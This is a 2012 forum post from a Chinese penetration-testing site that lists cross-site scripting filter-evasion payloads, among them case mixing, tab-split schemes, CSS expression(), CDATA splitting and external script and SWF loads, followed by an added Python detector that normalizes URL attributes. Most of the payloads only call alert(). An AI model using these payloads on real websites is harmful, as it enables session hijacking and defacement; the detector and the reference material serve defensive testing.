中国网络渗透测试联盟

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add some extra characters to evade the regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with another one

    <script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }
5. Insert some other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

    (the gaps inside "javascript" above are a tab or a newline character, shown here as spaces)
7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. script in HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in an SWF file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code apart, then reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
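The variants in items 1, 6, 8 and 14 (mixed case, a tab or newline inside the scheme, entity-encoded characters, and javascript: in src/href-type attributes) all defeat a filter that compares the raw attribute string against "javascript:". The check below is an added example, not code from the original post: it canonicalizes the value the way the browser's attribute and URL parsers do before deciding, so the same rule catches every variant. The function names, the attribute list and the sample fragment are the editor's own constructions.

```python
import html
import re

# Attributes from this thread whose values a browser treats as URLs
# (DYNSRC/LOWSRC/BACKGROUND only mattered in old IE; kept for completeness).
URL_ATTRS = ("src", "href", "dynsrc", "lowsrc", "background")
SCRIPT_SCHEMES = ("javascript", "vbscript")

# Matches attr="..." / attr='...' / unquoted attr=value, case-insensitive.
_ATTR_RE = re.compile(
    r"\b(" + "|".join(URL_ATTRS) + r")\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)
# C0 controls and space: browsers trim these from both ends of a URL.
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))

def normalize_url(value: str) -> str:
    """Canonicalize a URL attribute value as the browser does before it
    resolves the scheme: decode HTML entities (attribute parsing comes
    first), trim leading/trailing controls and spaces, drop tab/LF/CR
    anywhere, lowercase the scheme. A filter comparing the raw string
    against 'javascript:' misses every one of those variants."""
    decoded = html.unescape(value).strip(_C0_AND_SPACE)
    decoded = re.sub(r"[\t\n\r]", "", decoded)
    scheme, sep, rest = decoded.partition(":")
    return scheme.lower() + sep + rest

def is_script_url(value: str) -> bool:
    """True when the normalized value would execute script as a URL."""
    scheme, sep, _ = normalize_url(value).partition(":")
    return bool(sep) and scheme in SCRIPT_SCHEMES

def find_script_urls(fragment: str) -> list[str]:
    """Raw values of URL attributes in an HTML fragment that normalize to a
    script scheme; usable as a detection rule over stored content."""
    hits = []
    for match in _ATTR_RE.finditer(fragment):
        raw = next(g for g in match.groups()[1:] if g is not None)
        if is_script_url(raw):
            hits.append(raw)
    return hits

# Constructed sample built from evasion classes in this thread: embedded tab
# and newline, mixed case, an entity-encoded 'j', and one harmless image URL.
SAMPLE = (
    "<IMG SRC=\"jav\tascr\nipt:alert('XSS3')\">"
    "<IFRAME SRC=JaVaScRiPt:alert('XSS27')></IFRAME>"
    "<A HREF=\"&#x6A;avascript:alert('XSS')\">link</A>"
    "<IMG SRC=\"https://example.invalid/logo.png\">"
)
```

Blocklisting schemes is a detection aid, not an output-encoding strategy: the expression(), DATASRC, HTML+TIME and DYNSRC items depend on legacy IE behaviour that this check does not model, and the durable fix remains contextual output encoding plus an allowlist of permitted URL schemes.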
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2